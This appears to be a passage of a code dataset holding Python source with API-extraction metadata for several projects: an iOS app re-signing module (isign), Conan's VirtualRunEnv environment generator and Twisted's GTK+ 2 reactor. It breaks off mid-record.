\"\"\"\n self.path = path\n self.relative_bundle_dir = relative_bundle_dir\n self.archive_class = archive_class\n bundle_path = normpath(join(path, relative_bundle_dir))\n self.bundle = App(bundle_path)\n\n def archive(self, output_path):\n \"\"\" Re-zip this back up, or simply copy it out, depending on what the\n original archive class did \"\"\"\n self.archive_class.archive(self.path, output_path)\n\n def clone(self, target_path):\n \"\"\" Copy the uncompressed archive somewhere else, return initialized\n UncompressedArchive \"\"\"\n shutil.copytree(self.path, target_path)\n return self.__class__(target_path,\n self.relative_bundle_dir,\n self.archive_class)\n\n def remove(self):\n # the containing dir might be gone already b/c AppArchive simply moves\n # it to the desired target when done\n if exists(self.path) and isdir(self.path):\n log.debug('removing ua: %s', self.path)\n shutil.rmtree(self.path)\n\n\ndef archive_factory(path):\n \"\"\" Guess what kind of archive we are dealing with, return an\n archive object. Returns None if path did not match any archive type \"\"\"\n archive = None\n for cls in [IpaArchive, AppZipArchive, AppArchive]:\n if cls.precheck(path):\n archive = cls(path)\n log.debug(\"File %s matched as %s\", path, cls.__name__)\n break\n return archive\n\n\ndef view(input_path):\n if not exists(input_path):\n raise IOError(\"{0} not found\".format(input_path))\n ua = None\n bundle_info = None\n try:\n archive = archive_factory(input_path)\n if archive is None:\n raise NotMatched('No matching archive type found')\n ua = archive.unarchive_to_temp()\n bundle_info = ua.bundle.info\n finally:\n if ua is not None:\n ua.remove()\n return bundle_info\n\n\ndef resign(input_path,\n certificate,\n key,\n apple_cert,\n provisioning_profile,\n output_path,\n info_props=None,\n alternate_entitlements_path=None):\n \"\"\" Unified interface to extract any kind of archive from\n a temporary file, resign it with these credentials,\n and create a similar archive for that resigned app \"\"\"\n\n if not exists(input_path):\n raise IOError(\"{0} not found\".format(input_path))\n\n log.debug('Signing with apple_cert: {}'.format(apple_cert))\n log.debug('Signing with key: {}'.format(key))\n log.debug('Signing with certificate: {}'.format(certificate))\n log.debug('Signing with provisioning_profile: {}'.format(provisioning_profile))\n\n signer = Signer(signer_cert_file=certificate,\n signer_key_file=key,\n apple_cert_file=apple_cert)\n\n ua = None\n bundle_info = None\n try:\n archive = archive_factory(input_path)\n if archive is None:\n raise NotSignable('No matching archive type found')\n ua = archive.unarchive_to_temp()\n if info_props:\n # Override info.plist props of the parent bundle\n ua.bundle.update_info_props(info_props)\n ua.bundle.resign(signer, provisioning_profile, alternate_entitlements_path)\n bundle_info = ua.bundle.info\n ua.archive(output_path)\n except NotSignable as e:\n msg = \"Not signable: <{0}>: {1}\\n\".format(input_path, e)\n log.info(msg)\n raise\n finally:\n if ua is not None:\n ua.remove()\n return bundle_info\n"},"apis":{"kind":"list like","value":["logging.getLogger","exceptions.MissingHelpers","signer.Signer","zipfile.ZipFile","exceptions.NotMatched","os.walk","os.path.exists","shutil.move","bundle.is_info_plist_native","bundle.Bundle","os.path.isdir","biplist.readPlistFromString","exceptions.NotSignable","re.match","os.path.isfile","os.path.dirname","tempfile.mkdtemp","zipfile.is_zipfile","distutils.spawn.find_executable","os.path.join","bundle.App","shutil.copytree","shutil.rmtree"],"string":"[\n \"logging.getLogger\",\n \"exceptions.MissingHelpers\",\n \"signer.Signer\",\n \"zipfile.ZipFile\",\n \"exceptions.NotMatched\",\n \"os.walk\",\n \"os.path.exists\",\n \"shutil.move\",\n \"bundle.is_info_plist_native\",\n \"bundle.Bundle\",\n \"os.path.isdir\",\n \"biplist.readPlistFromString\",\n \"exceptions.NotSignable\",\n \"re.match\",\n \"os.path.isfile\",\n \"os.path.dirname\",\n \"tempfile.mkdtemp\",\n \"zipfile.is_zipfile\",\n \"distutils.spawn.find_executable\",\n \"os.path.join\",\n \"bundle.App\",\n \"shutil.copytree\",\n \"shutil.rmtree\"\n]"},"extract_api":{"kind":"string","value":"[((706, 733), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\\n', (723, 733), False, 'import logging\\n'), ((1296, 1329), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {'prefix': '\"\"\"isign-\"\"\"'}), \"(prefix='isign-')\\n\", (1312, 1329), False, 'import tempfile\\n'), ((1790, 1815), 'os.walk', 'os.walk', (['root_bundle_path'], {}), '(root_bundle_path)\\n', (1797, 1815), False, 'import os\\n'), ((14421, 14511), 'signer.Signer', 'Signer', ([], {'signer_cert_file': 'certificate', 'signer_key_file': 'key', 'apple_cert_file': 'apple_cert'}), '(signer_cert_file=certificate, signer_key_file=key, apple_cert_file=\\n apple_cert)\\n', (14427, 14511), False, 'from signer import Signer\\n'), ((1053, 1087), 'distutils.spawn.find_executable', 'spawn.find_executable', (['helper_name'], {}), '(helper_name)\\n', (1074, 1087), False, 'from distutils import spawn\\n'), ((4526, 4553), 'bundle.is_info_plist_native', 'is_info_plist_native', (['plist'], {}), '(plist)\\n', (4546, 4553), False, 'from bundle import App, Bundle, is_info_plist_native\\n'), ((4702, 4721), 'os.path.exists', 'exists', (['output_path'], {}), '(output_path)\\n', (4708, 4721), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\\n'), ((4770, 4800), 'shutil.move', 'shutil.move', (['path', 'output_path'], {}), '(path, output_path)\\n', (4781, 4800), False, 'import shutil\\n'), ((5179, 5208), 'shutil.rmtree', 'shutil.rmtree', (['containing_dir'], {}), '(containing_dir)\\n', (5192, 5208), False, 'import shutil\\n'), ((5267, 5309), 'shutil.copytree', 'shutil.copytree', (['self.path', 'containing_dir'], {}), '(self.path, containing_dir)\\n', (5282, 5309), False, 'import shutil\\n'), ((7158, 7197), 'os.path.join', 'join', (['relative_bundle_dir', '\"\"\"Info.plist\"\"\"'], {}), \"(relative_bundle_dir, 'Info.plist')\\n\", (7162, 7197), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\\n'), ((8621, 8661), 'biplist.readPlistFromString', 'biplist.readPlistFromString', (['plist_bytes'], {}), '(plist_bytes)\\n', (8648, 8661), False, 'import biplist\\n'), ((8740, 8761), 'zipfile.ZipFile', 'zipfile.ZipFile', (['path'], {}), '(path)\\n', (8755, 8761), False, 'import zipfile\\n'), ((11904, 11920), 'bundle.App', 'App', (['bundle_path'], {}), '(bundle_path)\\n', (11907, 11920), False, 'from bundle import App, Bundle, is_info_plist_native\\n'), ((12294, 12333), 'shutil.copytree', 'shutil.copytree', (['self.path', 'target_path'], {}), '(self.path, target_path)\\n', (12309, 12333), False, 'import shutil\\n'), ((13222, 13240), 'os.path.exists', 'exists', (['input_path'], {}), '(input_path)\\n', (13228, 13240), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\\n'), ((14064, 14082), 'os.path.exists', 'exists', (['input_path'], {}), '(input_path)\\n', (14070, 14082), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\\n'), ((1909, 1921), 'bundle.Bundle', 'Bundle', (['path'], {}), '(path)\\n', (1915, 1921), False, 'from bundle import App, Bundle, is_info_plist_native\\n'), ((2805, 2852), 'exceptions.NotSignable', 'NotSignable', (['\"\"\"Cannot yet sign WatchKit bundles\"\"\"'], {}), \"('Cannot yet sign WatchKit bundles')\\n\", (2816, 2852), False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\\n'), ((4350, 4361), 'os.path.isdir', 'isdir', (['path'], {}), '(path)\\n', (4355, 4361), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\\n'), ((4735, 4761), 'shutil.rmtree', 'shutil.rmtree', (['output_path'], {}), '(output_path)\\n', (4748, 4761), False, 'import shutil\\n'), ((6664, 6704), 're.match', 're.match', (['cls.app_dir_pattern', 'file_name'], {}), '(cls.app_dir_pattern, file_name)\\n', (6672, 6704), False, 'import re\\n'), ((7495, 7507), 'os.path.isfile', 'isfile', (['path'], {}), '(path)\\n', (7501, 7507), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\\n'), ((7593, 7630), 'exceptions.MissingHelpers', 'MissingHelpers', (['\"\"\"helpers not present\"\"\"'], {}), \"('helpers not present')\\n\", (7607, 7630), False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\\n'), ((7792, 7816), 'zipfile.is_zipfile', 'zipfile.is_zipfile', (['path'], {}), '(path)\\n', (7810, 7816), False, 'import zipfile\\n'), ((7904, 7925), 'zipfile.ZipFile', 'zipfile.ZipFile', (['path'], {}), '(path)\\n', (7919, 7925), False, 'import zipfile\\n'), ((9129, 9175), 'os.path.join', 'join', (['containing_dir', 'self.relative_bundle_dir'], {}), '(containing_dir, self.relative_bundle_dir)\\n', (9133, 9175), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\\n'), ((10199, 10236), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {'prefix': '\"\"\"isign-zip-\"\"\"'}), \"(prefix='isign-zip-')\\n\", (10215, 10236), False, 'import tempfile\\n'), ((10265, 10295), 'os.path.join', 'join', (['temp_zip_dir', '\"\"\"temp.zip\"\"\"'], {}), \"(temp_zip_dir, 'temp.zip')\\n\", (10269, 10295), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\\n'), ((10393, 10432), 'shutil.move', 'shutil.move', (['temp_zip_file', 'output_path'], {}), '(temp_zip_file, output_path)\\n', (10404, 10432), False, 'import shutil\\n'), ((11849, 11880), 'os.path.join', 'join', (['path', 'relative_bundle_dir'], {}), '(path, relative_bundle_dir)\\n', (11853, 11880), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\\n'), ((12641, 12658), 'os.path.exists', 'exists', (['self.path'], {}), '(self.path)\\n', (12647, 12658), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\\n'), ((12663, 12679), 'os.path.isdir', 'isdir', (['self.path'], {}), '(self.path)\\n', (12668, 12679), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\\n'), ((12745, 12769), 'shutil.rmtree', 'shutil.rmtree', (['self.path'], {}), '(self.path)\\n', (12758, 12769), False, 'import shutil\\n'), ((13438, 13482), 'exceptions.NotMatched', 'NotMatched', (['\"\"\"No matching archive type found\"\"\"'], {}), \"('No matching archive type found')\\n\", (13448, 13482), False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\\n'), ((14686, 14731), 'exceptions.NotSignable', 'NotSignable', (['\"\"\"No matching archive type found\"\"\"'], {}), \"('No matching archive type found')\\n\", (14697, 14731), False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\\n'), ((2144, 2157), 'os.path.dirname', 'dirname', (['path'], {}), '(path)\\n', (2151, 2157), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\\n'), ((2753, 2772), 'shutil.rmtree', 'shutil.rmtree', (['path'], {}), '(path)\\n', (2766, 2772), False, 'import shutil\\n'), ((8304, 8331), 'bundle.is_info_plist_native', 'is_info_plist_native', (['plist'], {}), '(plist)\\n', (8324, 8331), False, 'from bundle import App, Bundle, is_info_plist_native\\n'), ((10566, 10585), 'os.path.isdir', 'isdir', (['temp_zip_dir'], {}), '(temp_zip_dir)\\n', (10571, 10585), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\\n'), ((10603, 10630), 'shutil.rmtree', 'shutil.rmtree', (['temp_zip_dir'], {}), '(temp_zip_dir)\\n', (10616, 10630), False, 'import shutil\\n')]"}}},{"rowIdx":726,"cells":{"code":{"kind":"string","value":"from conan.tools.env import Environment\n\n\ndef runenv_from_cpp_info(conanfile, cpp_info):\n \"\"\" return an Environment deducing the runtime information from a cpp_info\n \"\"\"\n dyn_runenv = Environment(conanfile)\n if cpp_info is None: # This happens when the dependency is a private one = BINARY_SKIP\n return dyn_runenv\n if cpp_info.bin_paths: # cpp_info.exes is not defined yet\n dyn_runenv.prepend_path(\"PATH\", cpp_info.bin_paths)\n # If it is a build_require this will be the build-os, otherwise it will be the host-os\n if cpp_info.lib_paths:\n dyn_runenv.prepend_path(\"LD_LIBRARY_PATH\", cpp_info.lib_paths)\n dyn_runenv.prepend_path(\"DYLD_LIBRARY_PATH\", cpp_info.lib_paths)\n if cpp_info.framework_paths:\n dyn_runenv.prepend_path(\"DYLD_FRAMEWORK_PATH\", cpp_info.framework_paths)\n return dyn_runenv\n\n\nclass VirtualRunEnv:\n \"\"\" captures the conanfile environment that is defined from its\n dependencies, and also from profiles\n \"\"\"\n\n def __init__(self, conanfile):\n self._conanfile = conanfile\n\n def environment(self):\n \"\"\" collects the runtime information from dependencies. For normal libraries should be\n very occasional\n \"\"\"\n runenv = Environment(self._conanfile)\n # FIXME: Missing profile info\n # FIXME: Cache value?\n\n host_req = self._conanfile.dependencies.host\n test_req = self._conanfile.dependencies.test\n for _, dep in list(host_req.items()) + list(test_req.items()):\n if dep.runenv_info:\n runenv.compose_env(dep.runenv_info)\n runenv.compose_env(runenv_from_cpp_info(self._conanfile, dep.cpp_info))\n\n return runenv\n\n def generate(self, auto_activate=False):\n run_env = self.environment()\n if run_env:\n run_env.save_script(\"conanrunenv\", auto_activate=auto_activate)\n"},"apis":{"kind":"list like","value":["conan.tools.env.Environment"],"string":"[\n \"conan.tools.env.Environment\"\n]"},"extract_api":{"kind":"string","value":"[((193, 215), 'conan.tools.env.Environment', 'Environment', (['conanfile'], {}), '(conanfile)\\n', (204, 215), False, 'from conan.tools.env import Environment\\n'), ((1243, 1271), 'conan.tools.env.Environment', 'Environment', (['self._conanfile'], {}), '(self._conanfile)\\n', (1254, 1271), False, 'from conan.tools.env import Environment\\n')]"}}},{"rowIdx":727,"cells":{"code":{"kind":"string","value":"# -*- test-case-name: twisted.internet.test -*-\n# Copyright (c) Twisted Matrix Laboratories.\n# See LICENSE for details.\n\n\n\"\"\"\nThis module provides support for Twisted to interact with the glib/gtk2\nmainloop.\n\nIn order to use this support, simply do the following::\n\n | from twisted.internet import gtk2reactor\n | gtk2reactor.install()\n\nThen use twisted.internet APIs as usual. The other methods here are not\nintended to be called directly.\n\nWhen installing the reactor, you can choose whether to use the glib\nevent loop or the GTK+ event loop which is based on it but adds GUI\nintegration.\n\"\"\"\n\n# System Imports\nimport sys, signal\n\nfrom zope.interface import implements\n\ntry:\n if not hasattr(sys, 'frozen'):\n # Don't want to check this for py2exe\n import pygtk\n pygtk.require('2.0')\nexcept (ImportError, AttributeError):\n pass # maybe we're using pygtk before this hack existed.\nimport gobject\nif hasattr(gobject, \"threads_init\"):\n # recent versions of python-gtk expose this. python-gtk=2.4.1\n # (wrapping glib-2.4.7) does. python-gtk=2.0.0 (wrapping\n # glib-2.2.3) does not.\n gobject.threads_init()\n\n# Twisted Imports\nfrom twisted.python import log, runtime, failure\nfrom twisted.python.compat import set\nfrom twisted.internet.interfaces import IReactorFDSet\nfrom twisted.internet import main, base, posixbase, error, selectreactor\n\nPOLL_DISCONNECTED = gobject.IO_HUP | gobject.IO_ERR | gobject.IO_NVAL\n\n# glib's iochannel sources won't tell us about any events that we haven't\n# asked for, even if those events aren't sensible inputs to the poll()\n# call.\nINFLAGS = gobject.IO_IN | POLL_DISCONNECTED\nOUTFLAGS = gobject.IO_OUT | POLL_DISCONNECTED\n\n\n\ndef _our_mainquit():\n # XXX: gtk.main_quit() (which is used for crash()) raises an exception if\n # gtk.main_level() == 0; however, all the tests freeze if we use this\n # function to stop the reactor. what gives? (I believe this may have been\n # a stupid mistake where I forgot to import gtk here... I will remove this\n # comment if the tests pass)\n import gtk\n if gtk.main_level():\n gtk.main_quit()\n\n\n\nclass Gtk2Reactor(posixbase.PosixReactorBase):\n \"\"\"\n GTK+-2 event loop reactor.\n\n @ivar _sources: A dictionary mapping L{FileDescriptor} instances to gtk\n watch handles.\n\n @ivar _reads: A set of L{FileDescriptor} instances currently monitored for\n reading.\n\n @ivar _writes: A set of L{FileDescriptor} instances currently monitored for\n writing.\n\n @ivar _simtag: A gtk timeout handle for the next L{simulate} call.\n \"\"\"\n implements(IReactorFDSet)\n\n def __init__(self, useGtk=True):\n self._simtag = None\n self._reads = set()\n self._writes = set()\n self._sources = {}\n posixbase.PosixReactorBase.__init__(self)\n # pre 2.3.91 the glib iteration and mainloop functions didn't release\n # global interpreter lock, thus breaking thread and signal support.\n if getattr(gobject, \"pygtk_version\", ()) >= (2, 3, 91) and not useGtk:\n self.context = gobject.main_context_default()\n self.__pending = self.context.pending\n self.__iteration = self.context.iteration\n self.loop = gobject.MainLoop()\n self.__crash = self.loop.quit\n self.__run = self.loop.run\n else:\n import gtk\n self.__pending = gtk.events_pending\n self.__iteration = gtk.main_iteration\n self.__crash = _our_mainquit\n self.__run = gtk.main\n\n\n if runtime.platformType == 'posix':\n def _handleSignals(self):\n # Let the base class do its thing, but pygtk is probably\n # going to stomp on us so go beyond that and set up some\n # signal handling which pygtk won't mess with. This would\n # be better done by letting this reactor select a\n # different implementation of installHandler for\n # _SIGCHLDWaker to use. Then, at least, we could fall\n # back to our extension module. See #4286.\n from twisted.internet.process import reapAllProcesses as _reapAllProcesses\n base._SignalReactorMixin._handleSignals(self)\n signal.signal(signal.SIGCHLD, lambda *a: self.callFromThread(_reapAllProcesses))\n if getattr(signal, \"siginterrupt\", None) is not None:\n signal.siginterrupt(signal.SIGCHLD, False)\n # Like the base, reap processes now in case a process\n # exited before the handlers above were installed.\n _reapAllProcesses()\n\n # The input_add function in pygtk1 checks for objects with a\n # 'fileno' method and, if present, uses the result of that method\n # as the input source. The pygtk2 input_add does not do this. The\n # function below replicates the pygtk1 functionality.\n\n # In addition, pygtk maps gtk.input_add to _gobject.io_add_watch, and\n # g_io_add_watch() takes different condition bitfields than\n # gtk_input_add(). We use g_io_add_watch() here in case pygtk fixes this\n # bug.\n def input_add(self, source, condition, callback):\n if hasattr(source, 'fileno'):\n # handle python objects\n def wrapper(source, condition, real_s=source, real_cb=callback):\n return real_cb(real_s, condition)\n return gobject.io_add_watch(source.fileno(), condition, wrapper)\n else:\n return gobject.io_add_watch(source, condition, callback)\n\n\n def _add(self, source, primary, other, primaryFlag, otherFlag):\n \"\"\"\n Add the given L{FileDescriptor} for monitoring either for reading or\n writing. If the file is already monitored for the other operation, we\n delete the previous registration and re-register it for both reading\n and writing.\n \"\"\"\n if source in primary:\n return\n flags = primaryFlag\n if source in other:\n gobject.source_remove(self._sources[source])\n flags |= otherFlag\n self._sources[source] = self.input_add(source, flags, self.callback)\n primary.add(source)\n\n\n def addReader(self, reader):\n \"\"\"\n Add a L{FileDescriptor} for monitoring of data available to read.\n \"\"\"\n self._add(reader, self._reads, self._writes, INFLAGS, OUTFLAGS)\n\n\n def addWriter(self, writer):\n \"\"\"\n Add a L{FileDescriptor} for monitoring ability to write data.\n \"\"\"\n self._add(writer, self._writes, self._reads, OUTFLAGS, INFLAGS)\n\n\n def getReaders(self):\n \"\"\"\n Retrieve the list of current L{FileDescriptor} monitored for reading.\n \"\"\"\n return list(self._reads)\n\n\n def getWriters(self):\n \"\"\"\n Retrieve the list of current L{FileDescriptor} monitored for writing.\n \"\"\"\n return list(self._writes)\n\n\n def removeAll(self):\n \"\"\"\n Remove monitoring for all registered L{FileDescriptor}s.\n \"\"\"\n return self._removeAll(self._reads, self._writes)\n\n\n def _remove(self, source, primary, other, flags):\n \"\"\"\n Remove monitoring the given L{FileDescriptor} for either reading or\n writing. If it's still monitored for the other operation, we\n re-register the L{FileDescriptor} for only that operation.\n \"\"\"\n if source not in primary:\n return\n gobject.source_remove(self._sources[source])\n primary.remove(source)\n if source in other:\n self._sources[source] = self.input_add(\n source, flags, self.callback)\n else:\n self._sources.pop(source)\n\n\n def removeReader(self, reader):\n \"\"\"\n Stop monitoring the given L{FileDescriptor} for reading.\n \"\"\"\n self._remove(reader, self._reads, self._writes, OUTFLAGS)\n\n\n def removeWriter(self, writer):\n \"\"\"\n Stop monitoring the given L{FileDescriptor} for writing.\n \"\"\"\n self._remove(writer, self._writes, self._reads, INFLAGS)\n\n\n doIterationTimer = None\n\n def doIterationTimeout(self, *args):\n self.doIterationTimer = None\n return 0 # auto-remove\n\n\n def doIteration(self, delay):\n # flush some pending events, return if there was something to do\n # don't use the usual \"while self.context.pending(): self.context.iteration()\"\n # idiom because lots of IO (in particular test_tcp's\n # ProperlyCloseFilesTestCase) can keep us from ever exiting.\n log.msg(channel='system', event='iteration', reactor=self)\n if self.__pending():\n self.__iteration(0)\n return\n # nothing to do, must delay\n if delay == 0:\n return # shouldn't delay, so just return\n self.doIterationTimer = gobject.timeout_add(int(delay * 1000),\n self.doIterationTimeout)\n # This will either wake up from IO or from a timeout.\n self.__iteration(1) # block\n # note: with the .simulate timer below, delays > 0.1 will always be\n # woken up by the .simulate timer\n if self.doIterationTimer:\n # if woken by IO, need to cancel the timer\n gobject.source_remove(self.doIterationTimer)\n self.doIterationTimer = None\n\n\n def crash(self):\n posixbase.PosixReactorBase.crash(self)\n self.__crash()\n\n\n def run(self, installSignalHandlers=1):\n self.startRunning(installSignalHandlers=installSignalHandlers)\n gobject.timeout_add(0, self.simulate)\n if self._started:\n self.__run()\n\n\n def _doReadOrWrite(self, source, condition, faildict={\n error.ConnectionDone: failure.Failure(error.ConnectionDone()),\n error.ConnectionLost: failure.Failure(error.ConnectionLost()),\n }):\n why = None\n inRead = False\n if condition & POLL_DISCONNECTED and not (condition & gobject.IO_IN):\n if source in self._reads:\n why = main.CONNECTION_DONE\n inRead = True\n else:\n why = main.CONNECTION_LOST\n else:\n try:\n if condition & gobject.IO_IN:\n why = source.doRead()\n inRead = True\n if not why and condition & gobject.IO_OUT:\n # if doRead caused connectionLost, don't call doWrite\n # if doRead is doWrite, don't call it again.\n if not source.disconnected:\n why = source.doWrite()\n except:\n why = sys.exc_info()[1]\n log.msg('Error In %s' % source)\n log.deferr()\n\n if why:\n self._disconnectSelectable(source, why, inRead)\n\n\n def callback(self, source, condition):\n log.callWithLogger(source, self._doReadOrWrite, source, condition)\n self.simulate() # fire Twisted timers\n return 1 # 1=don't auto-remove the source\n\n\n def simulate(self):\n \"\"\"\n Run simulation loops and reschedule callbacks.\n \"\"\"\n if self._simtag is not None:\n gobject.source_remove(self._simtag)\n self.runUntilCurrent()\n timeout = min(self.timeout(), 0.1)\n if timeout is None:\n timeout = 0.1\n # grumble\n self._simtag = gobject.timeout_add(int(timeout * 1010), self.simulate)\n\n\n\nclass PortableGtkReactor(selectreactor.SelectReactor):\n \"\"\"\n Reactor that works on Windows.\n\n Sockets aren't supported by GTK+'s input_add on Win32.\n \"\"\"\n _simtag = None\n\n def crash(self):\n selectreactor.SelectReactor.crash(self)\n import gtk\n # mainquit is deprecated in newer versions\n if gtk.main_level():\n if hasattr(gtk, 'main_quit'):\n gtk.main_quit()\n else:\n gtk.mainquit()\n\n\n def run(self, installSignalHandlers=1):\n import gtk\n self.startRunning(installSignalHandlers=installSignalHandlers)\n gobject.timeout_add(0, self.simulate)\n # mainloop is deprecated in newer versions\n if hasattr(gtk, 'main'):\n gtk.main()\n else:\n gtk.mainloop()\n\n\n def simulate(self):\n \"\"\"\n Run simulation loops and reschedule callbacks.\n \"\"\"\n if self._simtag is not None:\n gobject.source_remove(self._simtag)\n self.iterate()\n timeout = min(self.timeout(), 0.1)\n if timeout is None:\n timeout = 0.1\n # grumble\n self._simtag = gobject.timeout_add(int(timeout * 1010), self.simulate)\n\n\n\ndef install(useGtk=True):\n \"\"\"\n Configure the twisted mainloop to be run inside the gtk mainloop.\n\n @param useGtk: should glib rather than GTK+ event loop be\n used (this will be slightly faster but does not support GUI).\n \"\"\"\n reactor = Gtk2Reactor(useGtk)\n from twisted.internet.main import installReactor\n installReactor(reactor)\n return reactor\n\n\n\ndef portableInstall(useGtk=True):\n \"\"\"\n Configure the twisted mainloop to be run inside the gtk mainloop.\n \"\"\"\n reactor = PortableGtkReactor()\n from twisted.internet.main import installReactor\n installReactor(reactor)\n return reactor\n\n\n\nif runtime.platform.getType() != 'posix':\n install = portableInstall\n\n\n\n__all__ = ['install']\n"},"apis":{"kind":"list like","value":["twisted.internet.posixbase.PosixReactorBase.__init__","twisted.internet.process.reapAllProcesses","zope.interface.implements","signal.siginterrupt","sys.exc_info","twisted.python.log.deferr","twisted.python.runtime.platform.getType","twisted.internet.error.ConnectionDone","twisted.internet.posixbase.PosixReactorBase.crash","twisted.python.compat.set","gtk.main_level","gtk.mainquit","gtk.main_quit","gobject.threads_init","twisted.python.log.msg","pygtk.require","twisted.python.log.callWithLogger","gobject.main_context_default","gobject.MainLoop","gtk.main","twisted.internet.main.installReactor","twisted.internet.error.ConnectionLost","twisted.internet.base._SignalReactorMixin._handleSignals","gobject.io_add_watch","twisted.internet.selectreactor.SelectReactor.crash","gobject.timeout_add","gobject.source_remove","gtk.mainloop"],"string":"[\n \"twisted.internet.posixbase.PosixReactorBase.__init__\",\n \"twisted.internet.process.reapAllProcesses\",\n \"zope.interface.implements\",\n \"signal.siginterrupt\",\n \"sys.exc_info\",\n \"twisted.python.log.deferr\",\n \"twisted.python.runtime.platform.getType\",\n \"twisted.internet.error.ConnectionDone\",\n \"twisted.internet.posixbase.PosixReactorBase.crash\",\n \"twisted.python.compat.set\",\n \"gtk.main_level\",\n \"gtk.mainquit\",\n \"gtk.main_quit\",\n \"gobject.threads_init\",\n \"twisted.python.log.msg\",\n \"pygtk.require\",\n \"twisted.python.log.callWithLogger\",\n \"gobject.main_context_default\",\n \"gobject.MainLoop\",\n \"gtk.main\",\n \"twisted.internet.main.installReactor\",\n \"twisted.internet.error.ConnectionLost\",\n \"twisted.internet.base._SignalReactorMixin._handleSignals\",\n \"gobject.io_add_watch\",\n \"twisted.internet.selectreactor.SelectReactor.crash\",\n \"gobject.timeout_add\",\n \"gobject.source_remove\",\n \"gtk.mainloop\"\n]"},"extract_api":{"kind":"string","value":"[((1126, 1148), 'gobject.threads_init', 'gobject.threads_init', ([], {}), '()\\n', (1146, 1148), False, 'import gobject\\n'), ((2087, 2103), 'gtk.main_level', 'gtk.main_level', ([], {}), '()\\n', (2101, 2103), False, 'import gtk\\n'), ((2597, 2622), 'zope.interface.implements', 'implements', (['IReactorFDSet'], {}), '(IReactorFDSet)\\n', (2607, 2622), False, 'from zope.interface import implements\\n'), ((12990, 13013), 'twisted.internet.main.installReactor', 'installReactor', (['reactor'], {}), '(reactor)\\n', (13004, 13013), False, 'from twisted.internet.main import installReactor\\n'), ((13248, 13271), 'twisted.internet.main.installReactor', 'installReactor', (['reactor'], {}), '(reactor)\\n', (13262, 13271), False, 'from twisted.internet.main import installReactor\\n'), ((13297, 13323), 'twisted.python.runtime.platform.getType', 'runtime.platform.getType', ([], {}), '()\\n', (13321, 13323), False, 'from twisted.python import log, runtime, failure\\n'), ((795, 815), 'pygtk.require', 'pygtk.require', (['\"\"\"2.0\"\"\"'], {}), \"('2.0')\\n\", (808, 815), False, 'import pygtk\\n'), ((2113, 2128), 'gtk.main_quit', 'gtk.main_quit', ([], {}), '()\\n', (2126, 2128), False, 'import gtk\\n'), ((2711, 2716), 'twisted.python.compat.set', 'set', ([], {}), '()\\n', (2714, 2716), False, 'from twisted.python.compat import set\\n'), ((2740, 2745), 'twisted.python.compat.set', 'set', ([], {}), '()\\n', (2743, 2745), False, 'from twisted.python.compat import set\\n'), ((2781, 2822), 'twisted.internet.posixbase.PosixReactorBase.__init__', 'posixbase.PosixReactorBase.__init__', (['self'], {}), '(self)\\n', (2816, 2822), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\\n'), ((7418, 7462), 'gobject.source_remove', 'gobject.source_remove', (['self._sources[source]'], {}), '(self._sources[source])\\n', (7439, 7462), False, 'import gobject\\n'), ((8531, 8589), 'twisted.python.log.msg', 'log.msg', ([], {'channel': '\"\"\"system\"\"\"', 'event': '\"\"\"iteration\"\"\"', 'reactor': 'self'}), \"(channel='system', event='iteration', reactor=self)\\n\", (8538, 8589), False, 'from twisted.python import log, runtime, failure\\n'), ((9360, 9398), 'twisted.internet.posixbase.PosixReactorBase.crash', 'posixbase.PosixReactorBase.crash', (['self'], {}), '(self)\\n', (9392, 9398), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\\n'), ((9547, 9584), 'gobject.timeout_add', 'gobject.timeout_add', (['(0)', 'self.simulate'], {}), '(0, self.simulate)\\n', (9566, 9584), False, 'import gobject\\n'), ((10856, 10922), 'twisted.python.log.callWithLogger', 'log.callWithLogger', (['source', 'self._doReadOrWrite', 'source', 'condition'], {}), '(source, self._doReadOrWrite, source, condition)\\n', (10874, 10922), False, 'from twisted.python import log, runtime, failure\\n'), ((11652, 11691), 'twisted.internet.selectreactor.SelectReactor.crash', 'selectreactor.SelectReactor.crash', (['self'], {}), '(self)\\n', (11685, 11691), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\\n'), ((11773, 11789), 'gtk.main_level', 'gtk.main_level', ([], {}), '()\\n', (11787, 11789), False, 'import gtk\\n'), ((12058, 12095), 'gobject.timeout_add', 'gobject.timeout_add', (['(0)', 'self.simulate'], {}), '(0, self.simulate)\\n', (12077, 12095), False, 'import gobject\\n'), ((3083, 3113), 'gobject.main_context_default', 'gobject.main_context_default', ([], {}), '()\\n', (3111, 3113), False, 'import gobject\\n'), ((3242, 3260), 'gobject.MainLoop', 'gobject.MainLoop', ([], {}), '()\\n', (3258, 3260), False, 'import gobject\\n'), ((4182, 4227), 'twisted.internet.base._SignalReactorMixin._handleSignals', 'base._SignalReactorMixin._handleSignals', (['self'], {}), '(self)\\n', (4221, 4227), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\\n'), ((4587, 4606), 'twisted.internet.process.reapAllProcesses', '_reapAllProcesses', ([], {}), '()\\n', (4604, 4606), True, 'from twisted.internet.process import reapAllProcesses as _reapAllProcesses\\n'), ((5463, 5512), 'gobject.io_add_watch', 'gobject.io_add_watch', (['source', 'condition', 'callback'], {}), '(source, condition, callback)\\n', (5483, 5512), False, 'import gobject\\n'), ((5977, 6021), 'gobject.source_remove', 'gobject.source_remove', (['self._sources[source]'], {}), 